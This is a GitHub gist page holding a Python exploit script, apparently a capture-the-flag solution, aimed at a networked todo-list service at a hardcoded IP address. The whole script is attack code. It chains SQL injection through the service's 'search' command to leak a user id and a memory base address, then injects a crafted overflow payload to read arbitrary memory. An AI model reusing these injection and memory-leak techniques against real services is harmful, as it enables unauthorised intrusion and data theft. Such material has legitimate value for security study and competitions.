Create a gist now

Instantly share code, notes, and snippets.

Embed
import random
import socket
import string
import sys
import time
from binascii import hexlify
from binascii import unhexlify
def make_address(offset, address):
return unhexlify("%016x" % (offset + address))[::-1]
def leak_data(address):
HOST = '88.198.89.199'
PORT = 1234
# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.settimeout(2)
s.recv(1024)
# Generate user
username = ''.join([random.choice(string.ascii_letters + string.digits) for i in range(16)])
# Register
s.sendall("register %s %s\n" % (username, username))
s.recv(1024)
# Login
s.sendall("login %s %s\n" % (username, username))
s.recv(1024)
# Leak userid
s.sendall("search x' union select id from users where name='%s'#\n" % (username))
s.recv(1024)
s.sendall("show 0\n")
userid = int(s.recv(1024)[3:])
# print "Userid: %d" % userid
# Leak base address
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(14)#\n")
s.recv(1024)
s.sendall("show 11\n")
s.recv(4)
offset = int(hexlify(s.recv(6)[::-1]), 16) - 0x19d0
# print "Base address: 0x%x" % offset
s.recv(1024)
# Add dummy value and payload
payload = '\x00' * 56 + '\x02' + '\x00' * 7
payload += make_address(offset, 0x223d)
payload += make_address(offset, 0x2238)
payload += make_address(offset, 0x2020)
payload += make_address(offset, address)
payload = hexlify(payload)
s.sendall("add dummy'), (%s, unhex('%s'))##" % (userid, payload))
s.recv(1024)
# Overflow payload to 0x203d68
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(10) union select content from todos where user=%s#\n" % userid)
s.recv(1024)
# Test
s.sendall("help\n")
s.recv(1024)
data = s.recv(1024)[115:]
print "Leaked: %s" % hexlify(data[:-1])
leak_data(int(sys.argv[1], 16))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment